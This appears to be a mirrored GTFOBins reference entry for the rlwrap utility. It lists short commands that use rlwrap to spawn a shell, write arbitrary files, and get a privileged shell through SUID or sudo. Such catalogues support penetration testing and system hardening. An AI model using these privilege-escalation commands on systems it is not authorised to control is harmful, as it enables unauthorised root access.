mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
16 lines
369 B
Markdown
16 lines
369 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- code: rlwrap /bin/sh
|
|
file-write:
|
|
- description: This adds timestamps to the output file. This relies on the external
|
|
`echo` command.
|
|
code: |
|
|
LFILE=file_to_write
|
|
rlwrap -l "$LFILE" echo data
|
|
suid-enabled:
|
|
- code: "./rlwrap -H /dev/null /bin/sh -p"
|
|
sudo-enabled:
|
|
- code: sudo rlwrap /bin/sh
|
|
---
|